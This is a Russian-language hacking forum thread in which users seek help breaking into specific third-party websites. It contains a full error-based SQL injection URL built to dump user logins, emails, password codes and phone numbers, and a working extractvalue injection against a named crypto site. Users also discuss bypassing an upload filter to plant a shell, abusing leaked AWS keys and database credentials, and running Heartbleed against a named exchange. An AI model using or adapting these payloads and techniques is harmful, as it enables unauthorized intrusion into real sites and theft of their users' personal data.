товарищи, подскажите как залиться. Есть сайт, можно заливать все, кроме .php и .js. Все кроме этого превращается в файлы вида 5b19a3b042627.shtm или 5b19a6bc64a3f.php4 имя формирует сайт, причем даже если я заливаю .htaccess то зальется 5b19a6bc65a3f.htaccess. Имена файлов после заливки известны. После заливки .php и .js возвращается ошибка и битый урл типа site.ru/files/up/news/Array. SSI не работает(видать выключен), .phtml и .php2-5 не исполняются, .htaccess переименовывается после заливки. Есть еще доступ к редактированию некоторых страниц на сайте через tinymce. подскажите куда еще можно копнуть, спасибо.
Друзья, подскажите в каком направлении копать. Тестирую сайт на уязвимости, всё что удалось из него выжать, это конфиги от амазоновских инстансов: define("S3_REGION",'***'); define("S3_KEY",'***'); define("S3_SECRET",'***'); define("S3_BUCKET",'***'); И аналогичный конфиг есть под амазоновскую базу, хост, логин, пароль, на хосте все порты закрыты, база извне не доступна, но и шелла на сайте у меня нет, только эти конфиги. Я не силен в тонкостях работы с амазоновскими инстансами, если есть эксперты, будьте добры, подскажите, что я могу сделать с этими данными. Как желаемый максимум, попасть в базу данных, но повторюсь, физического доступа к тестируему сайту у меня нет. PS: пароли от конфигов вбивались куда только можно под разными вариациями, SSH,FTP,Mail админка, и так далее, всё пока бесполезно.
К сожалению, я могу лишь высказать предположение, так как не эксперт по AWS и не сталкивался с подобным случаем. По идее копироваться ничего не должно, тулза предназначена для монтирования удалённого хранилища. А по файлам, возможно, стоит глянуть в сторону AWS KMS и разобраться как оно работает, но это не точно
Добрый подскажите касательно sql-inj: Хост/имя юзверя/название БД/Таблиц/Колонок - вытаскивается отлично (Как и в sqlmap|jSQL|так и ручками, через тот же Extractvalue) Но не дает вытянуть данные: Например при таком запросе (jSQL): Code: site.ru/maps.php?gorod=%c2%e8%ed%ed%e8%f6%e0'or(select+1+from(select+count(*),concat(((select+concat(0x53714c69,mid((select+concat(group_concat(0x04,r,0x05,q,0x04+order+by+r+separator+0x06),0x01030307)from(select+cast(concat(trim(ifnull(`add_group_id`,0x00)),0x7f,trim(ifnull(`email`,0x00)),0x7f,trim(ifnull(`group_id`,0x00)),0x7f,trim(ifnull(`id`,0x00)),0x7f,trim(ifnull(`is_provider_id`,0x00)),0x7f,trim(ifnull(`login`,0x00)),0x7f,trim(ifnull(`name`,0x00)),0x7f,trim(ifnull(`pass_code`,0x00)),0x7f,trim(ifnull(`phone`,0x00)))as+char)r,cast(count(*)as+char)q+from`uzver_frontenda`.`MS_user_shop`group+by+r+limit+0,65536)x),1,64)))),floor(rand(0)*2))from+information_schema.tables+group+by+2)x)or'--+ В ответ: Code: Error occured, script stoped Error type: Parser Error Source, line: Parser[359] Error: Wrong prefix in table name! Error information: Use key {DBNICK} to set prefix key for table: MS_user_shop Доп данные: CMS: Melbis Shop Web: PHP 5.3.3, Apache 2.2.22 Mysql: 5.1.73-log Is DBA: False
Что за дич нашел бурп как раскрутить? кто может помоч? Изучил https://exploitstube.com/sql-injection-abusing-xxe-in-oracle.html Помогите вектор наити а то на снифере приходи пустота, скину прив
Можно что нить достать через эти ошибки ? Code: Warning: preg_match() expects parameter 2 to be string, array given in /data/storage/hosting/www/users/a6939/sites/САЙТ/www/kernel/kernel.php on line 65 Warning: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /data/storage/hosting/www/users/a6939/sites/САЙТ/www/classes/Session.php on line 199 Warning: strlen() expects parameter 1 to be string, array given in /data/storage/hosting/www/users/a6939/sites/САЙТ/www/modules/lostpass/ajax.php on line 16 {"error":10,"error_msg":"\u0412\u0432\u0435\u0434\u0438\u0442\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u044f"} Code: Attack details Cookie input QSID was set to T3JqNVNBclMwQVFlaUlLaXJwV1E3eVp5N3k= Error message found: <b>Warning</b>: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>/data/storage/hosting/www/users/a6939/sites/САЙТ/www/classes/Session.php</b> on line <b>199</b><br />
https://www.europecoin.eu.org/planetcrypto/tags?ordering=postcount&sorting=desc&start=18' мап не крутит, вручную выдает ошибку 500 с этим что-то можно сделать?
Иньекция в limit, в запросе есть order by через union не выйдет. Можете через ошибку получить текущего пользователя, версию БД и название базы данных, стоит патч подзапросы не будут работать. Ну и есть не опасный waf, учтите это! Code: start=18 procedure analyse(extractvalue(0x0a,concat(0x0a,version())),1)-- - XPATH syntax error: ' 5.5.60-0ubuntu0.14.04.1'
Если ругается на \ это инекцыя, если addslashes() крутется так \` OR 1=1 --, может быть фрагментированая инекция
Nessus показывает тут www.bitxoxo.exchange TLS Version 1.0 Protocol Detection Но почему я эксплоитом heartbleed не могу пробить ? Или nessus напиздел ?